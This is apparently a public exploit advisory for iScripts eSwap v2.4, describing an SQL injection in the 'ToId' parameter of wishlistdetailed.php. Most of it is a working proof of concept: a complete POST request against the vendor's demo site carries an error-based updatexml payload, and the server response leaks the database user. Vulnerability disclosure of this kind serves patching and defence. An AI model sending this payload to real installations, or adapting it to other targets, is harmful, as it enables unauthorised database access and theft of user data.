Exploit title: iScripts eSwap v2.4 - SQL injection via the wishlistdetailed.php User Panel
Date: 22/05/2018
Exploit Author: Keyone
Vendor Homepage: https://www.iscripts.com
Software Link: https://www.iscripts.com/eswap
Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php
Version: 2.4
Tested on: Windows 7
Category: Webapps
CVE:
Description
iScripts eSwap v2.4 has SQL injection via the "wishlistdetailed.php" function parameter in User Panel.
POC : 'ToId' parameter
Request:
POST /eswap/demo/wishlistdetailed.php?type=wish HTTP/1.1
Host: www.demo.iscripts.com
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: */*
DNT: 1
Referer: https://www.demo.iscripts.com/eswap/demo/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __utmc=227100805; __utmz=227100805.1526871632.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=csv8f9jgmjl6sh1spblmikbra0; messagesUtk=4f44605715d9c930d9c1241135f98fbf; __utma=129714457.1643618766.1526980257.1526980257.1526980257.1; __utmc=129714457; __utmz=129714457.1526980257.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227100805.862283.1526871632.1526871632.1526980259.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
btnGo=Send%20Message&btnSubAdd=1&msgId=1&qyery=type=wish&ToId=1' and (select updatexml(1,concat(0x2b,user()),1))+and '1'='1&txtMsg=1&txtMsg70=1&txtTitle=1&txtTitle70=Mr.Response:
HTTP/1.1 200 OK
Date: Tue, 22 May 2018 11:28:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18898
...
</div></div>
<div class="col-lg-9">
<div>
XPATH syntax error: '+productd_dmouser@localhost'